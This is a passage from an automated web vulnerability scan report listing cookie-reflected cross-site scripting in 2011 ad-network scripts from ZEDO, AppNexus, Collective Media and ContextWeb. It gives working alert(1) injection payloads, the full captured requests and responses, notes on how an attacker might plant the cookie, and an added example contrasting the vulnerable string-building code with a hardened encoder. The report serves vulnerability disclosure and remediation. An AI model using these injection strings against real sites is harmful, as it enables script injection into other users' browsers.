PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1504B1120,1#734726|0,1,1;expires=Wed, 16 Mar 2011 01:15:16 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=56
Expires: Mon, 14 Feb 2011 01:16:12 GMT
Date: Mon, 14 Feb 2011 01:15:16 GMT
Connection: close
Content-Length: 2262

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
lert(1)-"d10b3dd5fdd';

var zzhasAd=undefined;


                                                                                                                                       var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411296a5"-alert(1)-"d10b3dd5fdd;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.499. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string literal enclosed in double quotation marks. The payload 3cf59"-alert(1)-"fb9a43b493b was submitted in the ZEDOIDA cookie and is echoed unmodified in the response. The value is reflected twice: first inside a single-quoted literal (zzuid='INmz6woBADYAAHrQ5V4AAACH~0104113cf59"-alert(1)-"fb9a43b493b';), where a double-quote payload is inert, and then in the double-quoted zzStr literal, where the first " closes the string.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response; the second reflection is the one that executes. A cookie value containing an unescaped ' would break out of the zzuid literal in the same way, so both output sites need encoding, not only the one this payload happened to hit.

Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker needs a way to plant a chosen value in the victim's browser, typically a cookie-setting or header-injection flaw on any zedo.com host (the server's own cookies are scoped to domain=.zedo.com) or, as the endpoint is plain http://, an attacker on the network path. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104113cf59"-alert(1)-"fb9a43b493b; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:21 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=283
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:21 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
n')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104113cf59"-alert(1)-"fb9a43b493b';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~0104113cf59"-alert(1)-"fb9a43b493b;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.500. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string literal enclosed in double quotation marks. The payload 8c93a"-alert(1)-"b3a2dd65c8e was submitted in the ZEDOIDA cookie and is echoed unmodified in the response. As in fm.js, fmr.js reflects the value twice: inside the single-quoted zzuid='...' literal, where a double-quote payload is inert, and inside the double-quoted zzStr literal (var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~0104118c93a"-alert(1)-"b3a2dd65c8e;z=" + Math.random();), where the first " closes the string.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response; the zzStr reflection is the one that executes, and a cookie value containing an unescaped ' would break out of the zzuid literal as well.

Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker needs a way to plant a chosen value in the victim's browser, typically a cookie-setting or header-injection flaw on any zedo.com host (the server's own cookies are scoped to domain=.zedo.com) or, as the endpoint is plain http://, an attacker on the network path. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104118c93a"-alert(1)-"b3a2dd65c8e; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:09 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=50
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:09 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
n')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104118c93a"-alert(1)-"b3a2dd65c8e';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~0104118c93a"-alert(1)-"b3a2dd65c8e;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.501. http://ib.adnxs.com/acb [acb816623 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The value of the acb816623 cookie is copied into a JavaScript string literal enclosed in single quotation marks, inside the inline <script> block of a text/html response (var flashAd='<OBJECT id="160209410712429838" ... cnd=!...7b313'-alert(1)-'9993ffb1984/clickenc=...'). The payload 7b313'-alert(1)-'9993ffb1984 was submitted in the acb816623 cookie and is echoed unmodified.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the payload's first ' closes the flashAd literal and alert(1) runs when the page is rendered. Because this is an inline script in an HTML document, a cookie value containing </script> would be a second route out of the literal, independent of quoting, so an encoder for this output site must neutralise < and / as well as the quote characters. The response also expires the cookie (Set-Cookie: acb816623=; expires=Fri, 01-Jan-1980 00:00:00 GMT; HttpOnly), so a planted value is consumed on its first use.

Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker needs a way to plant a chosen value in the victim's browser, typically a cookie-setting or header-injection flaw on any adnxs.com host (the cookies here are scoped to domain=.adnxs.com) or, as the endpoint is plain http://, an attacker on the network path. The HttpOnly flag on the server's cookies blocks document.cookie access from page script but does not prevent either of those routes, which both use Set-Cookie headers. This limitation considerably mitigates the impact of the vulnerability.
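Issues 1.497 through 1.500 build zzStr by concatenating the ZEDOIDA cookie into a double-quoted literal, and 1.501 does the same with acb816623 inside the single-quoted flashAd literal of an inline script. The following added example is not ZEDO's or AppNexus's code: the builder functions are reconstructed from the echoed lines in this report, and running the generated script through new Function with a counting alert() stand-in is an assumption made so it can execute outside a browser. It runs the as-served pattern beside a hardened one that emits the cookie through a self-delimiting string encoder:

```javascript
'use strict';

// Added example (not ZEDO's or AppNexus's code): the string-building pattern
// behind issues 1.497-1.500 and 1.501, reconstructed from the echoed lines,
// beside a hardened form, both executed with alert() replaced by a counter.

// Encode an untrusted value as a self-delimited JavaScript string literal.
// Quotes, backslash and line terminators are escaped so the value cannot end
// the literal; < > & / are escaped too so an inline script can never contain
// a literal "</script>" (the second breakout route in an HTML response).
function jsStringLiteral(value) {
  const escaped = String(value).replace(/[\\"'<>&\/\r\n\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
  return '"' + escaped + '"';
}

// As served (issue 1.497): the ZEDOIDA cookie concatenated into a double-quoted literal.
function buildZzStrVulnerable(zedoida) {
  return 'var zzStr = "s=916;u=' + zedoida + ';z=" + Math.random();\nreturn zzStr;';
}

// Hardened: the cookie value is emitted through jsStringLiteral().
function buildZzStrSafe(zedoida) {
  return 'var zzStr = "s=916;u=" + ' + jsStringLiteral(zedoida) + ' + ";z=" + Math.random();\nreturn zzStr;';
}

// Run generated script text with alert() replaced by a counter (assumption:
// this stands in for the browser; a real page would show the dialog).
function runScript(source) {
  let fired = 0;
  const fakeAlert = () => { fired += 1; return 0; };
  let result;
  try {
    result = new Function('alert', source)(fakeAlert);
  } catch (e) {
    result = 'error:' + e.name;
  }
  return { fired, result };
}

// ZEDOIDA value from issue 1.497, including the scanner's payload.
const ZEDOIDA_PAYLOAD = 'INmz6woBADYAAHrQ5V4AAACH~0104115f097"-alert(1)-"548f1a5dacf';

function compare(zedoida) {
  return {
    vulnerable: runScript(buildZzStrVulnerable(zedoida)),
    safe: runScript(buildZzStrSafe(zedoida)),
  };
}

// The literal must round-trip any value, including the characters it escapes.
function roundTrips(value) {
  return new Function('return ' + jsStringLiteral(value))() === value;
}

console.log(compare(ZEDOIDA_PAYLOAD));
```

In the vulnerable build the generated line is exactly the one echoed by fm.js, and alert fires once while zzStr ends up as NaN; in the hardened build alert never fires and zzStr carries the cookie value verbatim. Because jsStringLiteral supplies its own delimiters and escapes both quote characters, the same encoder fixes the single-quoted zzuid='...' and flashAd='...' sites; escaping < and / additionally keeps a literal </script> out of an inline script, which matters for the text/html response in 1.501 but not for an external .js file.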

Request

GET /acb?member=311&width=300&height=250&pb=300&cb=4221178&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEQjMeBAKGAEgASgBMIue4uoEChII_IgBEAoYASABKAEw3I3i6gQKEgi_jwEQChgBIAEoATCLjeLqBBCLnuLqBBgF; acb816623=5_[r^208WMv$PLv20/dR:zugL?enc=q6qqqqqqCkAAAAAAAAAIQAAAAAAAAAhAFo_mI4TiCkDDEDl9Pd8NQA5lMDecLTkCBWHfHSmrEEILj1hNAAAAAAk5AwA3AQAANQEAAAIAAADifwEA5FoAAAEAAABVU0QAVVNEACwB-gCZFNQEqAgBAgUCAAIAAAAAYxn0oAAAAAA.&tt_code=cm.drudgerep&udj=uf%28%27a%27%2C+3338%2C+1297649419%29%3Buf%28%27c%27%2C+15498%2C+1297649419%29%3Buf%28%27r%27%2C+98274%2C+1297649419%29%3Bppv%282932%2C+%27160209410712429838%27%2C+1297649419%2C+1297735819%2C+15498%2C+23268%29%3B&cnd=!VxeUoQiKeRDi_wUYACDktQEo1Akxqazeuz3fDUBCEwgAEAAYACABKP7__________wFIAFAAWJkpYABotQI.7b313'-alert(1)-'9993ffb1984; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb816623=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 02:10:33 GMT
Content-Length: 5609

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">
<!--
(function(){var flashAd='<OBJECT id="160209410712429838" data="http://cdn.
...[SNIP]...
TkCBWHfHSmrEEILj1hNAAAAAAk5AwA3AQAANQEAAAIAAADifwEA5FoAAAEAAABVU0QAVVNEACwB-gCZFNQEqAgBAQUCAAIAAAAAYhnjoAAAAAA./cnd=!VxeUoQiKeRDi_wUYACDktQEo1Akxqazeuz3fDUBCEwgAEAAYACABKP7__________wFIAFAAWJkpYABotQI.7b313'-alert(1)-'9993ffb1984/clickenc=http%3A%2F%2Fwww.paloaltonetworks.com%2Fcam%2FgartnerMQ%2Freport.php%3Fts%3DRetargeter" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="300" HEIGHT="250" flashvars="clickTag=http:
...[SNIP]...

1.502. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.dailymail/ron_052010

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 764c2"%3balert(1)//cda0fdaa892 was submitted in the cli cookie. This input was echoed as 764c2";alert(1)//cda0fdaa892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338;ord1=572356;cmpgurl=http%253A//www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3764c2"%3balert(1)//cda0fdaa892; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:35:26 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:26 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:26 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 14-Feb-2011 09:35:26 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:26 GMT
Content-Length: 8103

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11d765b6a10b1b3764c2";alert(1)//cda0fdaa892&seg_code=noseg&ord=1297647326",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);Collect
...[SNIP]...

1.503. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9370'%3balert(1)//736866c8cde was submitted in the V cookie. This input was echoed as c9370';alert(1)//736866c8cde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

